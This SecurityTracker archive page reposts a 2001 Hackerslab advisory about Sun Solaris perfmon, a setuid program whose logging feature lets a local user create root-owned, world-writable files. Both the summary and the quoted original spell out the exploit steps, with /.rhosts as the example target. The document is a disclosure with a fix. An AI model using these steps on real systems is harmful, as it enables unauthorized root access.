SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
About the Archives
Want to learn about the SecurityTracker archives? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Generic)  >  Perfmon Vendors:  Sun
Sun Solaris Perfmon Application Can Create Files with Root-Level Privileges
Date:  Mar 23 2001 15:23 (UTC/GMT)
Impact:  Modification of system information, Root access via local system
Exploit Included:  Yes  
Advisory:  Hackerslab
Description:  Hackerslab reports a vulnerability in the "perfmon" application for Sun Solaris. The application (/opt/JSParm/bin/perfmon), which is used to display system information, can create files on the server with root-level permissions.

By using the logging feature of perfmon, a local user can cause perfmon to create files with root-level privileges on the server.

The author of the source message indicates the following exploit steps:

$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &

Choose "Logging -> Logging File". In the "Selection" part, input the file path you want to create, such as "/.rhosts". The following file will be created:

-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost
Impact:  A local user can create files on the server with root-level permissions. This could readily lead to root-level access to the server.
Solution:  No solution was available at the time of this entry. The author of the source message recommends that you remove setuid permission for perfmon.
Vendor URL:  http://www.sun.com
Cause:  Access control error
Underlying OS:  UNIX (Solaris - SunOS)
Reported By:   KimYongJun <s96192@CE.HANNAM.AC.KR>
Message History:   None.

 Message Contents
Date:  Fri, 23 Mar 2001 17:11:52 +0900
From:   KimYongJun <s96192@CE.HANNAM.AC.KR>
Subject:  [ Hackerslab bug_paper ] SunOS application perfmon vulnerability

 

==============================================================================

       [ Hackerslab bug_paper ] SunOS application perfmon vulnerability

==============================================================================

File   :   /opt/JSParm/bin/perfmon

SYSTEM : Solaris 2.X

INFO :

parm is a program that displays system information .
parm is SunOS application.  It's  not included in Solaris basic package.

There is a vulneribility in perfmon program that you can create
any file with root privilege as follow:

$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &


Choose Logging -> Logging File
In Selection part, input the file path you want to create
ex:) /.rhosts

following file is created in a second.
-rw-rw-rw-   1 root     loveyou         144 Mar  9 03:14 .rhost


SOLUTION :

remove setuid permition, contact your vendor and get a patch.



==-------------------------------------------------------------------------------==
       ********
   *    **   **    *
 *      **   **      *
*       ******       *
 *      **   **      *                                     loveyou@hackerslab.org
   *    **   **    *                                 [  http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2001, SecurityGlobal.net LLC